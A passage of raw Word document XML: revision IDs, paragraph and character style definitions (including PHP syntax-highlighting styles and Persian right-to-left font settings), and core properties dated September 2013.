    <w:rsid w:val="00225A6D"/>
    <w:rsid w:val="0023324C"/>
    <w:rsid w:val="0024106A"/>
    <w:rsid w:val="00241B9D"/>
    <w:rsid w:val="002A66ED"/>
    <w:rsid w:val="002D3EE2"/>
    <w:rsid w:val="002D6543"/>
    <w:rsid w:val="003013DC"/>
    <w:rsid w:val="00307ACB"/>
    <w:rsid w:val="00352640"/>
    <w:rsid w:val="00380F8D"/>
    <w:rsid w:val="00386272"/>
    <w:rsid w:val="003912C4"/>
    <w:rsid w:val="003F1B9E"/>
    <w:rsid w:val="003F7F13"/>
    <w:rsid w:val="004026DF"/>
    <w:rsid w:val="00412BBD"/>
    <w:rsid w:val="00435BC3"/>
    <w:rsid w:val="004377EB"/>
    <w:rsid w:val="00446CAF"/>
    <w:rsid w:val="00487705"/>
    <w:rsid w:val="004878A3"/>
    <w:rsid w:val="00491EFF"/>
    <w:rsid w:val="004D19C6"/>
    <w:rsid w:val="00510BA0"/>
    <w:rsid w:val="0055155F"/>
    <w:rsid w:val="005A5EE3"/>
    <w:rsid w:val="005C4954"/>
    <w:rsid w:val="00631D9A"/>
    <w:rsid w:val="00681551"/>
    <w:rsid w:val="006D3693"/>
    <w:rsid w:val="006F4700"/>
    <w:rsid w:val="006F5B56"/>
    <w:rsid w:val="00706AB2"/>
    <w:rsid w:val="0070771C"/>
    <w:rsid w:val="0071224C"/>
    <w:rsid w:val="00713987"/>
    <w:rsid w:val="0072275D"/>
    <w:rsid w:val="00742A31"/>
    <w:rsid w:val="007543B1"/>
    <w:rsid w:val="00782C3A"/>
    <w:rsid w:val="007D36E6"/>
    <w:rsid w:val="007E64AB"/>
    <w:rsid w:val="00810C2F"/>
    <w:rsid w:val="00874518"/>
    <w:rsid w:val="00895F39"/>
    <w:rsid w:val="008E58DE"/>
    <w:rsid w:val="009578E3"/>
    <w:rsid w:val="0098226D"/>
    <w:rsid w:val="00A051C4"/>
    <w:rsid w:val="00A32C2A"/>
    <w:rsid w:val="00A41730"/>
    <w:rsid w:val="00A6697F"/>
    <w:rsid w:val="00AE7A3A"/>
    <w:rsid w:val="00AF4A04"/>
    <w:rsid w:val="00B22D74"/>
    <w:rsid w:val="00B36725"/>
    <w:rsid w:val="00B4407D"/>
    <w:rsid w:val="00B51EC6"/>
    <w:rsid w:val="00B90310"/>
    <w:rsid w:val="00B93FB3"/>
    <w:rsid w:val="00BB22DB"/>
    <w:rsid w:val="00BB6AB2"/>
    <w:rsid w:val="00C31ACB"/>
    <w:rsid w:val="00C715D7"/>
    <w:rsid w:val="00C75C0D"/>
    <w:rsid w:val="00CE6D30"/>
    <w:rsid w:val="00D11E58"/>
    <w:rsid w:val="00D21380"/>
    <w:rsid w:val="00D27C60"/>
    <w:rsid w:val="00D34775"/>
    <w:rsid w:val="00D372A3"/>
    <w:rsid w:val="00D55708"/>
    <w:rsid w:val="00DC4A71"/>
    <w:rsid w:val="00DD297E"/>
    <w:rsid w:val="00E00774"/>
    <w:rsid w:val="00E15CF7"/>
    <w:rsid w:val="00E20410"/>
    <w:rsid w:val="00E25B93"/>
    <w:rsid w:val="00E42946"/>
    <w:rsid w:val="00E445F0"/>
    <w:rsid w:val="00E54B77"/>
    <w:rsid w:val="00E70070"/>
    <w:rsid w:val="00E847D6"/>
    <w:rsid w:val="00E959D0"/>
    <w:rsid w:val="00ED5826"/>
    <w:rsid w:val="00F30EB4"/>
    <w:rsid w:val="00F34D5B"/>
    <w:rsid w:val="00F471C2"/>
    <w:rsid w:val="00F739AF"/>
    <w:rsid w:val="00F80E0A"/>
    <w:rsid w:val="00FC2FF2"/>
    <w:rsid w:val="00FD1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BBD"/>
    <w:pPr>
      <w:bidi/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin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3">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="004D19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D1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9C6"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="filename">
    <w:name w:val="filename"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-comment">
    <w:name w:val="phps-t-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable-marked">
    <w:name w:val="phps-t-variable-marked"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable">
    <w:name w:val="phps-t-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-code">
    <w:name w:val="phps-code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-constant-encapsed-string">
    <w:name w:val="phps-t-constant-encapsed-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden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4775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24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775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="fa-IR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91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912C4"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="fa-IR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00681551"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0023324C"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00435B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1">
    <w:name w:val="Medium Shading 1 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="63"/>
    <w:rsid w:val="00435B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5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mdgh</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-04T16:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-09-15T14:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>